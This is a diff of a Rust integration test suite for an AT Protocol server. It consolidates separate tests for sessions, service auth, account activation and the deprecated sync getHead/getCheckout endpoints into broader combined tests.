assert!(body.get("accessJwt").is_some());
74
-
}
75
-
76
-
#[tokio::test]
77
-
async fn test_create_session_missing_identifier() {
78
-
let client = client();
79
-
let payload = json!({
80
-
"password": "password"
81
-
});
82
-
let res = client
83
-
.post(format!(
84
-
"{}/xrpc/com.atproto.server.createSession",
85
-
base_url().await
86
-
))
87
-
.json(&payload)
88
-
.send()
89
-
.await
90
-
.expect("Failed to send request");
91
-
assert!(
92
-
res.status() == StatusCode::BAD_REQUEST || res.status() == StatusCode::UNPROCESSABLE_ENTITY,
93
-
"Expected 400 or 422 for missing identifier, got {}",
94
-
res.status()
95
-
);
96
-
}
97
-
98
-
#[tokio::test]
99
-
async fn test_create_account_invalid_handle() {
100
-
let client = client();
101
-
let payload = json!({
102
-
"handle": "invalid!handle.com",
103
-
"email": "test@example.com",
104
-
"password": "password"
105
-
});
106
-
let res = client
107
-
.post(format!(
108
-
"{}/xrpc/com.atproto.server.createAccount",
109
-
base_url().await
110
-
))
111
-
.json(&payload)
112
-
.send()
113
-
.await
114
-
.expect("Failed to send request");
115
-
assert_eq!(
116
-
res.status(),
117
-
StatusCode::BAD_REQUEST,
118
-
"Expected 400 for invalid handle chars"
119
-
);
120
-
}
121
-
122
-
#[tokio::test]
123
-
async fn test_get_session() {
124
-
let client = client();
125
-
let res = client
126
-
.get(format!(
127
-
"{}/xrpc/com.atproto.server.getSession",
128
-
base_url().await
129
-
))
130
-
.bearer_auth(AUTH_TOKEN)
131
-
.send()
132
-
.await
133
-
.expect("Failed to send request");
134
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
135
-
}
136
-
137
-
#[tokio::test]
138
-
async fn test_refresh_session() {
139
-
let client = client();
140
-
let handle = format!("refresh_user_{}", uuid::Uuid::new_v4());
141
-
let payload = json!({
142
-
"handle": handle,
143
-
"email": format!("{}@example.com", handle),
144
-
"password": "password"
145
-
});
146
-
let create_res = client
147
-
.post(format!(
148
-
"{}/xrpc/com.atproto.server.createAccount",
149
-
base_url().await
150
-
))
151
-
.json(&payload)
152
-
.send()
153
-
.await
154
-
.expect("Failed to create account");
155
-
assert_eq!(create_res.status(), StatusCode::OK);
156
-
let create_body: Value = create_res.json().await.unwrap();
157
-
let did = create_body["did"].as_str().unwrap();
158
-
let _ = verify_new_account(&client, did).await;
159
-
let login_payload = json!({
160
-
"identifier": handle,
161
-
"password": "password"
162
-
});
163
-
let res = client
164
-
.post(format!(
165
-
"{}/xrpc/com.atproto.server.createSession",
166
-
base_url().await
167
-
))
168
-
.json(&login_payload)
169
-
.send()
170
-
.await
171
-
.expect("Failed to login");
172
-
assert_eq!(res.status(), StatusCode::OK);
173
-
let body: Value = res.json().await.expect("Invalid JSON");
174
-
let refresh_jwt = body["refreshJwt"]
175
-
.as_str()
176
-
.expect("No refreshJwt")
177
-
.to_string();
178
-
let access_jwt = body["accessJwt"]
179
-
.as_str()
180
-
.expect("No accessJwt")
181
-
.to_string();
182
-
let res = client
183
-
.post(format!(
184
-
"{}/xrpc/com.atproto.server.refreshSession",
185
-
base_url().await
186
-
))
187
-
.bearer_auth(&refresh_jwt)
188
-
.send()
189
-
.await
190
-
.expect("Failed to refresh");
191
-
assert_eq!(res.status(), StatusCode::OK);
192
-
let body: Value = res.json().await.expect("Invalid JSON");
193
-
assert!(body["accessJwt"].as_str().is_some());
194
-
assert!(body["refreshJwt"].as_str().is_some());
195
-
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
196
-
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
197
-
}
198
-
199
-
#[tokio::test]
200
-
async fn test_delete_session() {
201
-
let client = client();
202
-
let res = client
203
-
.post(format!(
204
-
"{}/xrpc/com.atproto.server.deleteSession",
205
-
base_url().await
206
-
))
207
-
.bearer_auth(AUTH_TOKEN)
208
-
.send()
209
-
.await
210
-
.expect("Failed to send request");
211
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
212
}
213
214
#[tokio::test]
215
-
async fn test_get_service_auth_success() {
216
let client = client();
217
let (access_jwt, did) = create_account_and_login(&client).await;
218
-
let params = [("aud", "did:web:example.com")];
219
-
let res = client
220
-
.get(format!(
221
-
"{}/xrpc/com.atproto.server.getServiceAuth",
222
-
base_url().await
223
-
))
224
-
.bearer_auth(&access_jwt)
225
-
.query(¶ms)
226
-
.send()
227
-
.await
228
-
.expect("Failed to send request");
229
assert_eq!(res.status(), StatusCode::OK);
230
-
let body: Value = res.json().await.expect("Response was not valid JSON");
231
-
assert!(body["token"].is_string());
232
let token = body["token"].as_str().unwrap();
233
let parts: Vec<&str> = token.split('.').collect();
234
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
235
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
236
-
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
237
-
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
238
assert_eq!(claims["iss"], did);
239
assert_eq!(claims["sub"], did);
240
assert_eq!(claims["aud"], "did:web:example.com");
241
}
242
243
#[tokio::test]
244
-
async fn test_get_service_auth_with_lxm() {
245
let client = client();
246
-
let (access_jwt, did) = create_account_and_login(&client).await;
247
-
let params = [
248
-
("aud", "did:web:example.com"),
249
-
("lxm", "com.atproto.repo.getRecord"),
250
-
];
251
-
let res = client
252
-
.get(format!(
253
-
"{}/xrpc/com.atproto.server.getServiceAuth",
254
-
base_url().await
255
-
))
256
-
.bearer_auth(&access_jwt)
257
-
.query(¶ms)
258
-
.send()
259
-
.await
260
-
.expect("Failed to send request");
261
-
assert_eq!(res.status(), StatusCode::OK);
262
-
let body: Value = res.json().await.expect("Response was not valid JSON");
263
-
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
264
-
let token = body["token"].as_str().unwrap();
265
-
let parts: Vec<&str> = token.split('.').collect();
266
-
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
267
-
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
268
-
assert_eq!(claims["iss"], did);
269
-
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
270
-
}
271
-
272
-
#[tokio::test]
273
-
async fn test_get_service_auth_no_auth() {
274
-
let client = client();
275
-
let params = [("aud", "did:web:example.com")];
276
-
let res = client
277
-
.get(format!(
278
-
"{}/xrpc/com.atproto.server.getServiceAuth",
279
-
base_url().await
280
-
))
281
-
.query(¶ms)
282
-
.send()
283
-
.await
284
-
.expect("Failed to send request");
285
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
286
-
let body: Value = res.json().await.expect("Response was not valid JSON");
287
-
assert_eq!(body["error"], "AuthenticationRequired");
288
-
}
289
-
290
-
#[tokio::test]
291
-
async fn test_get_service_auth_missing_aud() {
292
-
let client = client();
293
let (access_jwt, _) = create_account_and_login(&client).await;
294
-
let res = client
295
-
.get(format!(
296
-
"{}/xrpc/com.atproto.server.getServiceAuth",
297
-
base_url().await
298
-
))
299
-
.bearer_auth(&access_jwt)
300
-
.send()
301
-
.await
302
-
.expect("Failed to send request");
303
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
304
-
}
305
-
306
-
#[tokio::test]
307
-
async fn test_check_account_status_success() {
308
-
let client = client();
309
-
let (access_jwt, _) = create_account_and_login(&client).await;
310
-
let res = client
311
-
.get(format!(
312
-
"{}/xrpc/com.atproto.server.checkAccountStatus",
313
-
base_url().await
314
-
))
315
-
.bearer_auth(&access_jwt)
316
-
.send()
317
-
.await
318
-
.expect("Failed to send request");
319
-
assert_eq!(res.status(), StatusCode::OK);
320
-
let body: Value = res.json().await.expect("Response was not valid JSON");
321
assert_eq!(body["activated"], true);
322
assert_eq!(body["validDid"], true);
323
assert!(body["repoCommit"].is_string());
324
assert!(body["repoRev"].is_string());
325
assert!(body["indexedRecords"].is_number());
326
-
}
327
-
328
-
#[tokio::test]
329
-
async fn test_check_account_status_no_auth() {
330
-
let client = client();
331
-
let res = client
332
-
.get(format!(
333
-
"{}/xrpc/com.atproto.server.checkAccountStatus",
334
-
base_url().await
335
-
))
336
-
.send()
337
-
.await
338
-
.expect("Failed to send request");
339
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
340
-
let body: Value = res.json().await.expect("Response was not valid JSON");
341
-
assert_eq!(body["error"], "AuthenticationRequired");
342
-
}
343
-
344
-
#[tokio::test]
345
-
async fn test_activate_account_success() {
346
-
let client = client();
347
-
let (access_jwt, _) = create_account_and_login(&client).await;
348
-
let res = client
349
-
.post(format!(
350
-
"{}/xrpc/com.atproto.server.activateAccount",
351
-
base_url().await
352
-
))
353
-
.bearer_auth(&access_jwt)
354
-
.send()
355
-
.await
356
-
.expect("Failed to send request");
357
-
assert_eq!(res.status(), StatusCode::OK);
358
-
}
359
-
360
-
#[tokio::test]
361
-
async fn test_activate_account_no_auth() {
362
-
let client = client();
363
-
let res = client
364
-
.post(format!(
365
-
"{}/xrpc/com.atproto.server.activateAccount",
366
-
base_url().await
367
-
))
368
-
.send()
369
-
.await
370
-
.expect("Failed to send request");
371
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
372
-
}
373
-
374
-
#[tokio::test]
375
-
async fn test_deactivate_account_success() {
376
-
let client = client();
377
-
let (access_jwt, _) = create_account_and_login(&client).await;
378
-
let res = client
379
-
.post(format!(
380
-
"{}/xrpc/com.atproto.server.deactivateAccount",
381
-
base_url().await
382
-
))
383
-
.bearer_auth(&access_jwt)
384
-
.json(&json!({}))
385
-
.send()
386
-
.await
387
-
.expect("Failed to send request");
388
-
assert_eq!(res.status(), StatusCode::OK);
389
}
···
6
use serde_json::{Value, json};
7
8
#[tokio::test]
9
+
async fn test_server_basics() {
10
let client = client();
11
+
let base = base_url().await;
12
+
let health = client.get(format!("{}/health", base)).send().await.unwrap();
13
+
assert_eq!(health.status(), StatusCode::OK);
14
+
assert_eq!(health.text().await.unwrap(), "OK");
15
+
let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap();
16
+
assert_eq!(describe.status(), StatusCode::OK);
17
+
let body: Value = describe.json().await.unwrap();
18
assert!(body.get("availableUserDomains").is_some());
19
}
20
21
#[tokio::test]
22
+
async fn test_account_and_session_lifecycle() {
23
let client = client();
24
+
let base = base_url().await;
25
let handle = format!("user_{}", uuid::Uuid::new_v4());
26
+
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
27
+
let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
28
+
.json(&payload).send().await.unwrap();
29
assert_eq!(create_res.status(), StatusCode::OK);
30
let create_body: Value = create_res.json().await.unwrap();
31
let did = create_body["did"].as_str().unwrap();
32
let _ = verify_new_account(&client, did).await;
33
+
let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
34
+
.json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap();
35
+
assert_eq!(login.status(), StatusCode::OK);
36
+
let login_body: Value = login.json().await.unwrap();
37
+
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
38
+
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
39
+
let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
40
+
.bearer_auth(&refresh_jwt).send().await.unwrap();
41
+
assert_eq!(refresh.status(), StatusCode::OK);
42
+
let refresh_body: Value = refresh.json().await.unwrap();
43
+
assert!(refresh_body["accessJwt"].as_str().is_some());
44
+
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
45
+
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
46
+
let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
47
+
.json(&json!({ "password": "password" })).send().await.unwrap();
48
+
assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY);
49
+
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
50
+
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
51
+
.send().await.unwrap();
52
+
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
53
+
let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base))
54
+
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
55
+
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
56
+
let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
57
+
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
58
+
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
59
}
60
61
#[tokio::test]
62
+
async fn test_service_auth() {
63
let client = client();
64
+
let base = base_url().await;
65
let (access_jwt, did) = create_account_and_login(&client).await;
66
+
let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
67
+
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap();
68
assert_eq!(res.status(), StatusCode::OK);
69
+
let body: Value = res.json().await.unwrap();
70
let token = body["token"].as_str().unwrap();
71
let parts: Vec<&str> = token.split('.').collect();
72
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
73
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
74
+
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
75
+
let claims: Value = serde_json::from_slice(&payload_bytes).unwrap();
76
assert_eq!(claims["iss"], did);
77
assert_eq!(claims["sub"], did);
78
assert_eq!(claims["aud"], "did:web:example.com");
79
+
let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
80
+
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
81
+
.send().await.unwrap();
82
+
assert_eq!(lxm_res.status(), StatusCode::OK);
83
+
let lxm_body: Value = lxm_res.json().await.unwrap();
84
+
let lxm_token = lxm_body["token"].as_str().unwrap();
85
+
let lxm_parts: Vec<&str> = lxm_token.split('.').collect();
86
+
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
87
+
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
88
+
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
89
+
let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
90
+
.query(&[("aud", "did:web:example.com")]).send().await.unwrap();
91
+
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
92
+
let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
93
+
.bearer_auth(&access_jwt).send().await.unwrap();
94
+
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
95
}
96
97
#[tokio::test]
98
+
async fn test_account_status_and_activation() {
99
let client = client();
100
+
let base = base_url().await;
101
let (access_jwt, _) = create_account_and_login(&client).await;
102
+
let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
103
+
.bearer_auth(&access_jwt).send().await.unwrap();
104
+
assert_eq!(status.status(), StatusCode::OK);
105
+
let body: Value = status.json().await.unwrap();
106
assert_eq!(body["activated"], true);
107
assert_eq!(body["validDid"], true);
108
assert!(body["repoCommit"].is_string());
109
assert!(body["repoRev"].is_string());
110
assert!(body["indexedRecords"].is_number());
111
+
let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
112
+
.send().await.unwrap();
113
+
assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
114
+
let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
115
+
.bearer_auth(&access_jwt).send().await.unwrap();
116
+
assert_eq!(activate.status(), StatusCode::OK);
117
+
let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
118
+
.send().await.unwrap();
119
+
assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
120
+
let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base))
121
+
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
122
+
assert_eq!(deactivate.status(), StatusCode::OK);
123
}
+73
-255
tests/sync_deprecated.rs
+73
-255
tests/sync_deprecated.rs
···
6
use serde_json::Value;
7
8
#[tokio::test]
9
-
async fn test_get_head_success() {
10
let client = client();
11
-
let (did, _jwt) = setup_new_user("gethead-success").await;
12
let res = client
13
-
.get(format!(
14
-
"{}/xrpc/com.atproto.sync.getHead",
15
-
base_url().await
16
-
))
17
.query(&[("did", did.as_str())])
18
-
.send()
19
-
.await
20
-
.expect("Failed to send request");
21
assert_eq!(res.status(), StatusCode::OK);
22
let body: Value = res.json().await.expect("Response was not valid JSON");
23
assert!(body["root"].is_string());
24
-
let root = body["root"].as_str().unwrap();
25
-
assert!(root.starts_with("bafy"), "Root CID should be a CID");
26
-
}
27
-
28
-
#[tokio::test]
29
-
async fn test_get_head_not_found() {
30
-
let client = client();
31
-
let res = client
32
-
.get(format!(
33
-
"{}/xrpc/com.atproto.sync.getHead",
34
-
base_url().await
35
-
))
36
-
.query(&[("did", "did:plc:nonexistent12345")])
37
-
.send()
38
-
.await
39
-
.expect("Failed to send request");
40
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
41
-
let body: Value = res.json().await.expect("Response was not valid JSON");
42
-
assert_eq!(body["error"], "HeadNotFound");
43
-
assert!(
44
-
body["message"]
45
-
.as_str()
46
-
.unwrap()
47
-
.contains("Could not find root")
48
-
);
49
-
}
50
-
51
-
#[tokio::test]
52
-
async fn test_get_head_missing_param() {
53
-
let client = client();
54
-
let res = client
55
-
.get(format!(
56
-
"{}/xrpc/com.atproto.sync.getHead",
57
-
base_url().await
58
-
))
59
-
.send()
60
-
.await
61
-
.expect("Failed to send request");
62
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
63
-
}
64
-
65
-
#[tokio::test]
66
-
async fn test_get_head_empty_did() {
67
-
let client = client();
68
-
let res = client
69
-
.get(format!(
70
-
"{}/xrpc/com.atproto.sync.getHead",
71
-
base_url().await
72
-
))
73
-
.query(&[("did", "")])
74
-
.send()
75
-
.await
76
-
.expect("Failed to send request");
77
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
78
-
let body: Value = res.json().await.expect("Response was not valid JSON");
79
-
assert_eq!(body["error"], "InvalidRequest");
80
-
}
81
-
82
-
#[tokio::test]
83
-
async fn test_get_head_whitespace_did() {
84
-
let client = client();
85
-
let res = client
86
-
.get(format!(
87
-
"{}/xrpc/com.atproto.sync.getHead",
88
-
base_url().await
89
-
))
90
-
.query(&[("did", " ")])
91
-
.send()
92
-
.await
93
-
.expect("Failed to send request");
94
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
95
-
}
96
-
97
-
#[tokio::test]
98
-
async fn test_get_head_changes_after_record_create() {
99
-
let client = client();
100
-
let (did, jwt) = setup_new_user("gethead-changes").await;
101
-
let res1 = client
102
-
.get(format!(
103
-
"{}/xrpc/com.atproto.sync.getHead",
104
-
base_url().await
105
-
))
106
.query(&[("did", did.as_str())])
107
-
.send()
108
-
.await
109
-
.expect("Failed to get initial head");
110
-
let body1: Value = res1.json().await.unwrap();
111
-
let head1 = body1["root"].as_str().unwrap().to_string();
112
create_post(&client, &did, &jwt, "Post to change head").await;
113
let res2 = client
114
-
.get(format!(
115
-
"{}/xrpc/com.atproto.sync.getHead",
116
-
base_url().await
117
-
))
118
.query(&[("did", did.as_str())])
119
-
.send()
120
-
.await
121
-
.expect("Failed to get head after record");
122
let body2: Value = res2.json().await.unwrap();
123
-
let head2 = body2["root"].as_str().unwrap().to_string();
124
-
assert_ne!(head1, head2, "Head CID should change after record creation");
125
}
126
127
#[tokio::test]
128
-
async fn test_get_checkout_success() {
129
let client = client();
130
-
let (did, jwt) = setup_new_user("getcheckout-success").await;
131
create_post(&client, &did, &jwt, "Post for checkout test").await;
132
let res = client
133
-
.get(format!(
134
-
"{}/xrpc/com.atproto.sync.getCheckout",
135
-
base_url().await
136
-
))
137
.query(&[("did", did.as_str())])
138
-
.send()
139
-
.await
140
-
.expect("Failed to send request");
141
assert_eq!(res.status(), StatusCode::OK);
142
-
assert_eq!(
143
-
res.headers()
144
-
.get("content-type")
145
-
.and_then(|h| h.to_str().ok()),
146
-
Some("application/vnd.ipld.car")
147
-
);
148
let body = res.bytes().await.expect("Failed to get body");
149
assert!(!body.is_empty(), "CAR file should not be empty");
150
assert!(body.len() > 50, "CAR file should contain actual data");
151
-
}
152
-
153
-
#[tokio::test]
154
-
async fn test_get_checkout_not_found() {
155
-
let client = client();
156
-
let res = client
157
-
.get(format!(
158
-
"{}/xrpc/com.atproto.sync.getCheckout",
159
-
base_url().await
160
-
))
161
-
.query(&[("did", "did:plc:nonexistent12345")])
162
-
.send()
163
-
.await
164
-
.expect("Failed to send request");
165
-
assert_eq!(res.status(), StatusCode::NOT_FOUND);
166
-
let body: Value = res.json().await.expect("Response was not valid JSON");
167
-
assert_eq!(body["error"], "RepoNotFound");
168
-
}
169
-
170
-
#[tokio::test]
171
-
async fn test_get_checkout_missing_param() {
172
-
let client = client();
173
-
let res = client
174
-
.get(format!(
175
-
"{}/xrpc/com.atproto.sync.getCheckout",
176
-
base_url().await
177
-
))
178
-
.send()
179
-
.await
180
-
.expect("Failed to send request");
181
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
182
-
}
183
-
184
-
#[tokio::test]
185
-
async fn test_get_checkout_empty_did() {
186
-
let client = client();
187
-
let res = client
188
-
.get(format!(
189
-
"{}/xrpc/com.atproto.sync.getCheckout",
190
-
base_url().await
191
-
))
192
-
.query(&[("did", "")])
193
-
.send()
194
-
.await
195
-
.expect("Failed to send request");
196
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
197
-
}
198
-
199
-
#[tokio::test]
200
-
async fn test_get_checkout_empty_repo() {
201
-
let client = client();
202
-
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
203
-
let res = client
204
-
.get(format!(
205
-
"{}/xrpc/com.atproto.sync.getCheckout",
206
-
base_url().await
207
-
))
208
-
.query(&[("did", did.as_str())])
209
-
.send()
210
-
.await
211
-
.expect("Failed to send request");
212
-
assert_eq!(res.status(), StatusCode::OK);
213
-
let body = res.bytes().await.expect("Failed to get body");
214
-
assert!(!body.is_empty(), "Even empty repo should return CAR header");
215
-
}
216
-
217
-
#[tokio::test]
218
-
async fn test_get_checkout_includes_multiple_records() {
219
-
let client = client();
220
-
let (did, jwt) = setup_new_user("getcheckout-multi").await;
221
-
for i in 0..5 {
222
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
223
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
224
}
225
-
let res = client
226
-
.get(format!(
227
-
"{}/xrpc/com.atproto.sync.getCheckout",
228
-
base_url().await
229
-
))
230
-
.query(&[("did", did.as_str())])
231
-
.send()
232
-
.await
233
-
.expect("Failed to send request");
234
-
assert_eq!(res.status(), StatusCode::OK);
235
-
let body = res.bytes().await.expect("Failed to get body");
236
-
assert!(body.len() > 500, "CAR file with 5 records should be larger");
237
-
}
238
-
239
-
#[tokio::test]
240
-
async fn test_get_head_matches_latest_commit() {
241
-
let client = client();
242
-
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
243
-
let head_res = client
244
-
.get(format!(
245
-
"{}/xrpc/com.atproto.sync.getHead",
246
-
base_url().await
247
-
))
248
-
.query(&[("did", did.as_str())])
249
-
.send()
250
-
.await
251
-
.expect("Failed to get head");
252
-
let head_body: Value = head_res.json().await.unwrap();
253
-
let head_root = head_body["root"].as_str().unwrap();
254
-
let latest_res = client
255
-
.get(format!(
256
-
"{}/xrpc/com.atproto.sync.getLatestCommit",
257
-
base_url().await
258
-
))
259
-
.query(&[("did", did.as_str())])
260
-
.send()
261
-
.await
262
-
.expect("Failed to get latest commit");
263
-
let latest_body: Value = latest_res.json().await.unwrap();
264
-
let latest_cid = latest_body["cid"].as_str().unwrap();
265
-
assert_eq!(
266
-
head_root, latest_cid,
267
-
"getHead root should match getLatestCommit cid"
268
-
);
269
-
}
270
-
271
-
#[tokio::test]
272
-
async fn test_get_checkout_car_header_valid() {
273
-
let client = client();
274
-
let (did, _jwt) = setup_new_user("getcheckout-header").await;
275
-
let res = client
276
-
.get(format!(
277
-
"{}/xrpc/com.atproto.sync.getCheckout",
278
-
base_url().await
279
-
))
280
.query(&[("did", did.as_str())])
281
-
.send()
282
-
.await
283
-
.expect("Failed to send request");
284
-
assert_eq!(res.status(), StatusCode::OK);
285
-
let body = res.bytes().await.expect("Failed to get body");
286
-
assert!(
287
-
body.len() >= 2,
288
-
"CAR file should have at least header length"
289
-
);
290
}
···
6
use serde_json::Value;
7
8
#[tokio::test]
9
+
async fn test_get_head_comprehensive() {
10
let client = client();
11
+
let (did, jwt) = setup_new_user("gethead").await;
12
let res = client
13
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
14
.query(&[("did", did.as_str())])
15
+
.send().await.expect("Failed to send request");
16
assert_eq!(res.status(), StatusCode::OK);
17
let body: Value = res.json().await.expect("Response was not valid JSON");
18
assert!(body["root"].is_string());
19
+
let root1 = body["root"].as_str().unwrap().to_string();
20
+
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
21
+
let latest_res = client
22
+
.get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await))
23
.query(&[("did", did.as_str())])
24
+
.send().await.expect("Failed to get latest commit");
25
+
let latest_body: Value = latest_res.json().await.unwrap();
26
+
let latest_cid = latest_body["cid"].as_str().unwrap();
27
+
assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid");
28
create_post(&client, &did, &jwt, "Post to change head").await;
29
let res2 = client
30
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
31
.query(&[("did", did.as_str())])
32
+
.send().await.expect("Failed to get head after record");
33
let body2: Value = res2.json().await.unwrap();
34
+
let root2 = body2["root"].as_str().unwrap().to_string();
35
+
assert_ne!(root1, root2, "Head CID should change after record creation");
36
+
let not_found_res = client
37
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
38
+
.query(&[("did", "did:plc:nonexistent12345")])
39
+
.send().await.expect("Failed to send request");
40
+
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
41
+
let error_body: Value = not_found_res.json().await.unwrap();
42
+
assert_eq!(error_body["error"], "HeadNotFound");
43
+
let missing_res = client
44
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
45
+
.send().await.expect("Failed to send request");
46
+
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
47
+
let empty_res = client
48
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
49
+
.query(&[("did", "")])
50
+
.send().await.expect("Failed to send request");
51
+
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
52
+
let whitespace_res = client
53
+
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
54
+
.query(&[("did", " ")])
55
+
.send().await.expect("Failed to send request");
56
+
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
57
}
58
59
#[tokio::test]
60
+
async fn test_get_checkout_comprehensive() {
61
let client = client();
62
+
let (did, jwt) = setup_new_user("getcheckout").await;
63
+
let empty_res = client
64
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
65
+
.query(&[("did", did.as_str())])
66
+
.send().await.expect("Failed to send request");
67
+
assert_eq!(empty_res.status(), StatusCode::OK);
68
+
let empty_body = empty_res.bytes().await.expect("Failed to get body");
69
+
assert!(!empty_body.is_empty(), "Even empty repo should return CAR header");
70
create_post(&client, &did, &jwt, "Post for checkout test").await;
71
let res = client
72
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
73
.query(&[("did", did.as_str())])
74
+
.send().await.expect("Failed to send request");
75
assert_eq!(res.status(), StatusCode::OK);
76
+
assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car"));
77
let body = res.bytes().await.expect("Failed to get body");
78
assert!(!body.is_empty(), "CAR file should not be empty");
79
assert!(body.len() > 50, "CAR file should contain actual data");
80
+
assert!(body.len() >= 2, "CAR file should have at least header length");
81
+
for i in 0..4 {
82
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
83
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
84
}
85
+
let multi_res = client
86
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
87
.query(&[("did", did.as_str())])
88
+
.send().await.expect("Failed to send request");
89
+
assert_eq!(multi_res.status(), StatusCode::OK);
90
+
let multi_body = multi_res.bytes().await.expect("Failed to get body");
91
+
assert!(multi_body.len() > 500, "CAR file with 5 records should be larger");
92
+
let not_found_res = client
93
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
94
+
.query(&[("did", "did:plc:nonexistent12345")])
95
+
.send().await.expect("Failed to send request");
96
+
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
97
+
let error_body: Value = not_found_res.json().await.unwrap();
98
+
assert_eq!(error_body["error"], "RepoNotFound");
99
+
let missing_res = client
100
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
101
+
.send().await.expect("Failed to send request");
102
+
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
103
+
let empty_did_res = client
104
+
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
105
+
.query(&[("did", "")])
106
+
.send().await.expect("Failed to send request");
107
+
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
108
}